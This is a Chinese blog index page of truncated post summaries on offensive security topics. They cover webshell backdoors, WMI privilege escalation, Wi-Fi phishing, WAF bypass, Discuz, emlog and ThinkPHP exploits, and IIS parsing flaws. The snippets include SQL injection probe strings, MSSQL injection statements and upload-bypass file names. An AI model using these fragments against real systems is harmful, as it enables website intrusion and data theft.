摘要: 原理解读: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法1:运行MOF文件指定为命令行参数将Mofcomp.exe文件。方法2:使用IMofCompiler接口和$CompileFile方法。方法3:拖放到%Syst... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(2174) 评论(0) 推荐(0)
摘要: 昨天中午打开电脑,对着菜刀在那翻啊翻,找到一个64bit的os。 因为这个ip不在曾经提权过的主机列表里面,心想这应该是个低权限的网站,顺手打个whoami试试,结果给我返回了"nt authoritysystem"。看来这是一条"漏网之鱼"啊,于是就有了下面一段颇为蛋疼的经历。 查看系统信... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(436) 评论(0) 推荐(0)
摘要: 官方下载地址:https://github.com/sophron/wifiphisher打不开的要翻GFW好事做到底wifiphisher-master.zip========================== 开源无线安全工具Wifiphisher能够对WPA加密的AP无线热点实施... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(4008) 评论(0) 推荐(0)
摘要: 中国菜刀,不用多说,是大多黑阔经常使用的工具,具体使用方法,网上有很多教程,这里我讲下如何给菜刀添加隐蔽后门。 1、后门如何触发 这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图 当我们... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(554) 评论(0) 推荐(0)
摘要: 0x00 越权漏洞 越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。所以测试越权就是和开发人员拼细心的过程。... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(201) 评论(0) 推荐(0)
摘要: 0x00 索引说明 6.30在OWASP的分享,关于业务安全的漏洞检测模型。进一步的延伸科普。 0x01 身份认证安全 1 暴力破解 在没有验证码限制或者一次验证码可以多次使用的地方,使用已知用户对密码进行暴力破解或者用一个通用密码对用户进行暴力破解。 简单的验证... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(2505) 评论(0) 推荐(0)
摘要: 0x01下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑–表能跑的出 列就GG了 然后没辙–晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。-0x02获取uc keyexp:faq.php?acti... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(1113) 评论(0) 推荐(0)
摘要: 昨天本站转载了emlog相册插件的漏洞分析文章,当然也有html版的getshell代码,喜欢的同学们可以直接用昨天文章中分享的代码。为了练习python,小弟用python又重写了一次,喜欢的同学们也一起研究一下吧。其实也比较简单。python版源代码:#!/usr/bin/env python#... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(574) 评论(0) 推荐(0)
摘要: NS区域传送(DNS zone transfer)指的是一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库。这为运行中的DNS服务提供了一定的冗余度,其目的是为了防止主的域名服务器因意外故障变得不可用时影响到整个域名的解析。一般来说,DNS区域传送操作只在网络里真的有备用域名DNS服... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(359) 评论(0) 推荐(0)
摘要: 从传统意义讲,当你在电脑中插入一张CD/DVD光盘,或者插入一个USB设备时,可以通过自动播放来运行一个包含恶意的文件,不过自动播放功能被关闭时,autorun.inf文件就无法自动执行你的文件了。然而通过TEENSY,你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(1395) 评论(0) 推荐(0)
摘要: 文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。请不要做一只咖啡馆里安静的猥琐大叔。 写在前面 从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(1802) 评论(0) 推荐(0)
摘要: 免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! "社工库"是运用社会工程学进行渗透测试时候积累的各方面数据的结构化数据库。 环境介绍 ①Host:Fedora(English)(server),win8(中文)②Fedora安装apache,M... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(53) 评论(0) 推荐(0)
摘要: 突破安全狗和360网站卫士 进来蛋疼 肾是疼 可能是测试娃娃测试的太多了。前几天朋友让我帮他检测下他的网站安全性,网站发来一看。哇靠,又是安全狗,又是360网站卫士,这可怎好。首先是找到一个可以填写意见反馈的地方,XSS搞到后台管理COOKIE,这里不截图了。后台有个FCK,不过360网... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(503) 评论(0) 推荐(0)
摘要: 简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'='... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(829) 评论(0) 推荐(0)
摘要: 一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg2.文件解析 wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为.asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(442) 评论(0) 推荐(0)
摘要: 很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入,一下是本人收集的一些mssql的sql语句.手工MSSQL注入常用SQL语句 and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from ... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(1697) 评论(0) 推荐(0)
摘要: 今天遇到一个在支付宝做安全的大牛,据说以前是做白帽子的(就是专门对付黑客的),我赶忙跑去问他,什么样的密码最安全,大牛给我看了几组牛逼密码,看完我彻底给跪了。 1、码农文艺到闹心且骗稿费的密码: 密码:ppnn13%dkstFsteb.1st 密码来源:"娉娉袅袅十三余,豆蔻梢头二月... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(368) 评论(0) 推荐(0)
摘要: 如下controller即可触发SQL注入: code 区域 public function test() { $uname = I('get.uname'); $u = M('user')->where(array( 'uname' => $unam... 阅读全文
posted @ 2016-01-23 17:46 h4ck0ne 阅读(3040) 评论(0) 推荐(0)